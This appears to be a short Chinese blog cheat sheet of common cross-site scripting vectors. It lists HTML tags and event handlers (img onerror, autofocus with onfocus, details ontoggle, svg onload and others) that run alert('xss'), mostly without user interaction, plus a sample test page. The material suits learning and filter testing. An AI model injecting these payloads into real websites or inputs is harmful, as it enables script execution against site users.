目录
< script >
< video >
XSS常用标签
<script> alert("xss"); </script>
<img src=1 onerror=alert("xss");>
<input onfocus="alert('xss');">
//竞争焦点,从而触发onbiur事件
<input onblur=alert('xss') autofocus><input autofocus>
//通过 autofocus 属性执行本身的focus事件,这个向量是使焦点自动跳转到输入元素上,触发焦点事件,无需用户去触发
<input onfocus="alert('xss');"autofocus>
<details ontoggle="alert('xss');"></details>
// 使用open属性触发ontoggle事件,无需用户去触发
<details open ontoggle="alert('xss');"></details>
<svg onload="alert('xss')"></svg>>
<select onfocus=alert('xss')></select>
// 通过autofocus 属性执行本身的focus事件,这个向量是使焦点自动跳转到输入元素上,触发焦点事件,无需用户去触发
<select onfocus="alert('xss')" autofocus></select>
<iframe onload=alert("xss");></iframe>
<video><source onerror="alert('xss')"></video>
<audio src="x" onerror=alert('xss');></audio>
<body onload=alert('xss');></body>
利用换行符以及 autofocus ,自动取触发 onscroll 事件,无需用户去触发。
< script >
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title> This is a Test </title>
</head>
<body>
<script>alert("This is a test about xss !");</script>
</body>
</html>
< img >

< input >

< details >

< svg >
< select >

< iframe >
< video >
< audio >
< body >


709

被折叠的 条评论
为什么被折叠?



